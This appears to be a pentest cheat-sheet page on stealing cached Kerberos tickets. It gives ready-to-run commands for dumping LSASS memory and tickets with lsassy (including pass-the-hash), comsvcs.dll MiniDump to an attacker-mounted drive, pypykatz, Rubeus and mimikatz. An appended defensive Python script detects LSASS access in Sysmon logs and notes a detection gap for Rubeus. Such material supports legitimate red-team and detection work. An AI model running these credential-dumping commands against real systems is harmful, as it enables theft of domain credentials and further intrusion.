Cached Kerberos tickets
MITRE ATT&CK™ Steal or Forge Kerberos Tickets - Technique T1558
Theory
Practice
Enumerate
# Enumerate TGT and TGS
klist tickets
# Enumerate sessions
klist sessions
.\Rubeus.exe triage
Dump tickets
# With a password
lsassy -d <DOMAIN.LOCAL> -u <USER> -p <PASSWORD> <TARGET> -K '/tmp/kerberos_tickets'
# With PtH
lsassy -d <DOMAIN.LOCAL> -u <USER> -H <NTHash> <TARGET> -K '/tmp/kerberos_tickets'
# With PtT
lsassy -k <TARGET> -K '/tmp/kerberos_tickets'
# Example of a dump where Z: is mounted on the attacking host
tasklist /fi "imagename eq lsass.exe"
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid Z:\lsass.dmp full
# Get Tickets
pypykatz lsa minidump /path/to/lsass.dmp -k /tmp/kerberos_tickets
# Dump all tickets
.\Rubeus.exe dump
# Dump the interesting one by luid
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
# Write ticket to disk
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export
Ask a TGS
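The dump commands above (the comsvcs.dll MiniDump, lsassy, pypykatz on an lsass.dmp, and mimikatz sekurlsa::tickets) all depend on reading LSASS process memory, which is exactly what Sysmon Event ID 10 (ProcessAccess) records. The following is an added defender-side example, not code from the original page: it parses a small set of constructed Sysmon-style records and flags any non-allowlisted process that opened lsass.exe with PROCESS_VM_READ or full access. The simplified `key=value|key=value` record format, the allowlist and the sample image paths are all assumptions for illustration.

```python
"""Flag LSASS memory access in Sysmon Event ID 10 (ProcessAccess) records.

Added defensive example, not part of the original page. The log lines are
constructed, and the record format, allowlist and access-mask check are
assumptions a defender would tune to the environment.
"""

# Process access-right bits (Windows process access mask).
PROCESS_VM_READ = 0x0010           # needed to read another process's memory
PROCESS_ALL_ACCESS = 0x1FFFFF      # what a typical MiniDump-style opener asks for

# Assumed allowlist of images that legitimately open LSASS (tune per environment).
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# Constructed sample records in a simplified key=value|key=value layout.
SAMPLE_LOG = [
    r"EventID=10|SourceImage=C:\Windows\System32\svchost.exe|TargetImage=C:\Windows\System32\lsass.exe|GrantedAccess=0x1000",
    r"EventID=10|SourceImage=C:\Windows\System32\rundll32.exe|TargetImage=C:\Windows\System32\lsass.exe|GrantedAccess=0x1FFFFF",
    r"EventID=10|SourceImage=C:\Windows\System32\notepad.exe|TargetImage=C:\Windows\System32\lsass.exe|GrantedAccess=0x1000",
    r"EventID=10|SourceImage=C:\Users\jdoe\AppData\Local\Temp\tool.exe|TargetImage=C:\Windows\System32\lsass.exe|GrantedAccess=0x1010",
    r"EventID=10|SourceImage=C:\Users\jdoe\AppData\Local\Temp\tool.exe|TargetImage=C:\Windows\System32\explorer.exe|GrantedAccess=0x1010",
    r"EventID=1|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /c whoami",
]


def parse_event(line):
    """Split one 'key=value|key=value' record into a dict of stripped fields."""
    fields = {}
    for part in line.split("|"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def is_suspicious_lsass_access(event):
    """True if a non-allowlisted process opened lsass.exe with memory-read rights."""
    if event.get("EventID") != "10":
        return False
    target = event.get("TargetImage", "").lower()
    if not target.endswith(r"\lsass.exe"):
        return False
    source = event.get("SourceImage", "").lower()
    if source in ALLOWED_SOURCES:
        return False
    granted = int(event.get("GrantedAccess", "0"), 16)
    # Dumping LSASS requires reading its memory: VM_READ set, or full access.
    return bool(granted & PROCESS_VM_READ) or granted == PROCESS_ALL_ACCESS


def detect(lines):
    """Return (SourceImage, GrantedAccess) for every record worth alerting on."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if is_suspicious_lsass_access(event):
            hits.append((event["SourceImage"], event["GrantedAccess"]))
    return hits


if __name__ == "__main__":
    for source, access in detect(SAMPLE_LOG):
        print(f"ALERT lsass.exe opened by {source} with GrantedAccess={access}")
```

Two records are flagged here: the rundll32.exe open with full access, which is what the comsvcs.dll MiniDump line above produces, and the unknown binary opening LSASS with 0x1010. The allowlisted svchost.exe and the notepad.exe open without VM_READ are not. Note the coverage gap for this page: Rubeus triage and Rubeus dump retrieve tickets through the LSA authentication-package API rather than by reading LSASS memory, so they do not generate such a ProcessAccess event and need different telemetry (for example command-line or module-load logging) to be seen.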
Resources